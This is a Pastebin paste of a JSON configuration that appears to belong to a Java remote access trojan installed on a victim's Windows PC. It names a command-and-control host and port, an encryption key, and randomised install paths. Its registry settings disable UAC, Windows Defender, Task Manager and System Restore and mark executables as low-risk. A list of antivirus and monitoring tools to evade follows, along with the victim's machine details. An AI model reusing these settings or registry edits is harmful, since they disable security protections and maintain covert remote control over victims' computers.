Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "serverPath": "C:\\Users\\Larry\\AppData\\Roaming\\mzjipfvdtk.txt",
- "securityRetry": 20,
- "vbox": false,
- "serverVersion": "v1.0.1",
- "mainPath": "C:\\Users\\Larry\\JGMVI",
- "nickName": "BTC",
- "vmware": false,
- "encryptKey": "aitCHKJKhsvedAUApILrTqETU",
- "operatingSystem": {
- "osDefaultArch": "x86",
- "country": {
- "code": "us",
- "name": "United States"
- },
- "antivirus": "Windows Defender, ",
- "icon": "windows10",
- "admin": false,
- "language": "English (United States)",
- "type": 1,
- "processor": 4,
- "osDefaultName": "Windows 10",
- "computerUser": "Larry",
- "javaArchitecture": "x86",
- "computerName": "LARRY-ACCOUNTIN",
- "name": "Windows 10 Enterprise",
- "osDefaultVersion": "10.0",
- "jreVersion": "1.8.0_181",
- "architecture": "amd64",
- "ram": "7 GB"
- },
- "uuid": "6b828d04-e7fe-4f2f-a055-b2dca0699906",
- "command": 1,
- "network": [
- {
- "delay": 2,
- "port": 4083,
- "dns": "humblechrisj.loginto.me"
- }
- ],
- "jrePath": "C:\\Users\\Larry\\Oracle\\bin\\javaw.exe",
- "userTitle": "Larry@LARRY-ACCOUNTIN",
- "security": [
- {
- "code": "open-file-security",
- "reg": [
- {
- "value": "\"SaveZoneInformation\"=dword:00000001\r\n",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
- "valuesCommand": [
- {
- "name": "SaveZoneInformation",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
- }
- ]
- },
- {
- "value": "\"LowRiskFileTypes\"=\".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;\"\r\n",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
- "valuesCommand": [
- {
- "name": "LowRiskFileTypes",
- "valueCommand": ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
- }
- ]
- },
- {
- "value": "\"SaveZoneInformation\"=\"-\"\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
- "valuesCommand": [
- {
- "name": "SaveZoneInformation",
- "valueCommand": "-",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
- }
- ]
- },
- {
- "value": "\"LowRiskFileTypes\"=\"-\"\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
- "valuesCommand": [
- {
- "name": "LowRiskFileTypes",
- "valueCommand": "-",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
- }
- ]
- }
- ],
- "name": {
- "en": "Open-File Security Warning"
- }
- },
- {
- "code": "disable-zone-checking",
- "reg": [
- {
- "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
- "key": "HKEY_CURRENT_USER\\Environment",
- "valuesCommand": [
- {
- "name": "SEE_MASK_NOZONECHECKS",
- "valueCommand": "1",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_CURRENT_USER\\Environment"
- }
- ]
- },
- {
- "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment",
- "valuesCommand": [
- {
- "name": "SEE_MASK_NOZONECHECKS",
- "valueCommand": "1",
- "valueCommandType": "REG_SZ",
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
- }
- ]
- }
- ],
- "name": {
- "en": "Disable Zone Checking"
- }
- },
- {
- "process": [
- "UserAccountControlSettings.exe"
- ],
- "code": "user-account-control",
- "reg": [
- {
- "value": "\"ConsentPromptBehaviorAdmin\"=dword:00000000\r\n\"ConsentPromptBehaviorUser\"=dword:00000000\r\n\"EnableLUA\"=dword:00000000\r\n\"PromptOnSecureDesktop\"=dword:00000000\r\n",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
- "valuesCommand": []
- }
- ],
- "name": {
- "en": "User Account Control"
- }
- },
- {
- "process": [
- "Taskmgr.exe"
- ],
- "code": "task-manager",
- "reg": [
- {
- "value": "\"DisableTaskMgr\"=dword:00000002\r\n",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
- "valuesCommand": [
- {
- "name": "DisableTaskMgr",
- "valueCommand": "2",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
- }
- ]
- }
- ],
- "name": {
- "en": "Task Manager"
- }
- },
- {
- "code": "restore-system",
- "reg": [
- {
- "value": "\"DisableConfig\"=dword:00000001\r\n\"DisableSR\"=dword:00000001\r\n",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore",
- "valuesCommand": [
- {
- "name": "DisableConfig",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
- },
- {
- "name": "DisableSR",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
- }
- ]
- }
- ],
- "name": {
- "en": "Restore System"
- }
- },
- {
- "process": [
- "ProcessHacker.exe"
- ],
- "code": "process-hacker",
- "name": {
- "en": "Process Hacker"
- }
- },
- {
- "process": [
- "procexp.exe"
- ],
- "code": "msconfig",
- "name": {
- "en": "MsConfig"
- }
- },
- {
- "process": [
- "MSASCuiL.exe",
- "MSASCui.exe",
- "MsMpEng.exe",
- "MpUXSrv.exe",
- "MpCmdRun.exe",
- "NisSrv.exe",
- "ConfigSecurityPolicy.exe"
- ],
- "code": "windows-defender",
- "reg": [
- {
- "value": "\"DisableAntiSpyware\"=dword:00000001\r\n",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender",
- "valuesCommand": [
- {
- "name": "DisableAntiSpyware",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender"
- }
- ]
- },
- {
- "value": "\"DisableBehaviorMonitoring\"=dword:00000001\r\n\"DisableOnAccessProtection\"=dword:00000001\r\n\"DisableScanOnRealtimeEnable\"=dword:00000001\r\n",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
- "valuesCommand": [
- {
- "name": "DisableBehaviorMonitoring",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
- },
- {
- "name": "DisableOnAccessProtection",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
- },
- {
- "name": "DisableScanOnRealtimeEnable",
- "valueCommand": "1",
- "valueCommandType": "REG_DWORD",
- "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
- }
- ]
- }
- ],
- "name": {
- "en": "Windows Defender"
- }
- },
- {
- "code": "windows-defender-exclusion",
- "name": {
- "en": "Windows Defender Exclusion"
- }
- },
- {
- "process": [
- "procexp.exe"
- ],
- "code": "process-explorer",
- "name": {
- "en": "Process Explorer"
- }
- },
- {
- "process": [
- "wireshark.exe",
- "tshark.exe",
- "text2pcap.exe",
- "rawshark.exe",
- "dumpcap.exe",
- "capinfos.exe"
- ],
- "code": "wireshark",
- "name": {
- "en": "Wireshark"
- }
- },
- {
- "process": [
- "Procmon.exe"
- ],
- "code": "process-monitor",
- "name": {
- "en": "Process Monitor"
- }
- },
- {
- "code": "avira",
- "name": {
- "en": "Avira"
- }
- },
- {
- "code": "eset",
- "name": {
- "en": "ESET Security"
- }
- },
- {
- "code": "bitdefender",
- "name": {
- "en": "Bitdefender"
- }
- },
- {
- "code": "malwarebytes",
- "name": {
- "en": "MalwareBytes"
- }
- },
- {
- "code": "adware-antivirus",
- "name": {
- "en": "Ad-Aware Antivirus"
- }
- },
- {
- "code": "bull-guard",
- "name": {
- "en": "Bull Guard Antivirus"
- }
- },
- {
- "code": "clamwin",
- "name": {
- "en": "ClamWin Antivirus"
- }
- },
- {
- "code": "comodo",
- "name": {
- "en": "COMODO Antivirus"
- }
- },
- {
- "code": "escan",
- "name": {
- "en": "EScan Antivirus"
- }
- },
- {
- "code": "f-secure",
- "name": {
- "en": "F-Secure Antivirus"
- }
- },
- {
- "code": "f-prot",
- "name": {
- "en": "F-PROT Antivirus"
- }
- },
- {
- "code": "gdata",
- "name": {
- "en": "G DATA Antivirus"
- }
- },
- {
- "code": "ikarus",
- "name": {
- "en": "IKARUS Antivirus"
- }
- },
- {
- "code": "immunet",
- "name": {
- "en": "Immunet Antivirus"
- }
- },
- {
- "code": "k7ultimate",
- "name": {
- "en": "K7 Security"
- }
- },
- {
- "code": "nano",
- "name": {
- "en": "NANO Antivirus"
- }
- },
- {
- "code": "panda",
- "name": {
- "en": "Panda Antivirus"
- }
- },
- {
- "code": "super-anti-spyware",
- "name": {
- "en": "SUPER Anti-Spyware"
- }
- },
- {
- "code": "trend-micro",
- "name": {
- "en": "Trend Micro Antivirus"
- }
- },
- {
- "code": "vipre-security",
- "name": {
- "en": "VIPRE"
- }
- },
- {
- "code": "mcshield",
- "name": {
- "en": "MCShield Anti-Malware Tool"
- }
- },
- {
- "code": "spybot",
- "name": {
- "en": "SPYBOT AntiMalware"
- }
- },
- {
- "code": "forti-client",
- "name": {
- "en": "FortiClient"
- }
- },
- {
- "code": "twister",
- "name": {
- "en": "Twister Antivirus"
- }
- },
- {
- "code": "quickheal",
- "name": {
- "en": "Quick Heal"
- }
- },
- {
- "code": "arcabit",
- "name": {
- "en": "Arcabit"
- }
- },
- {
- "code": "totaldefense",
- "name": {
- "en": "Total Defense"
- }
- },
- {
- "code": "emisoft",
- "name": {
- "en": "Emsisoft Anti-Malware"
- }
- },
- {
- "code": "zillya",
- "name": {
- "en": "Zillya"
- }
- },
- {
- "code": "tachyon",
- "name": {
- "en": "TACHYON"
- }
- },
- {
- "code": "trustport",
- "name": {
- "en": "TrustPort"
- }
- },
- {
- "code": "xvirus",
- "name": {
- "en": "Xvirus"
- }
- }
- ],
- "installDate": {
- "daysRunning": 0,
- "lastModified": 1576685577058
- },
- "installation": {
- "jarName": "YwJnB",
- "moduleFolder": "LLQcu",
- "moduleEntry": "ZgKdOtqwKDcUfsRZplMiNIZkxFWnZCITYRIQnhAneALQalUBbSKiRQTEZnabYjXvgbNikDvt/IuuMMwdSMVnSuTLnLWfJZHVtl/lPrxiOAajrPnmNDnqmSKZEIrZHYFhgESWDWQTMZjlTpjWXlNWebDvoNPUtQYDaUMBDxeJckICJJmRdLbtHlXKIQigeaR.lrQFnaCQPrXFFrlHwFMIxnnIHLTruYFGtsadPfVUcGjAZoJiTkKVwrAWWAGGmOZWKRqVwvc",
- "uniqueIDFile": ".ntusernt.ini",
- "delay": 2,
- "jreFolder": "Oracle",
- "active": true,
- "mainFolder": "JGMVI",
- "moduleExtension": "gGS",
- "jarExtension": "class",
- "jarRegistry": "UgYGDsA"
- },
- "localIp": "172.16.0.2"
- }
Add Comment
Please, Sign In to add comment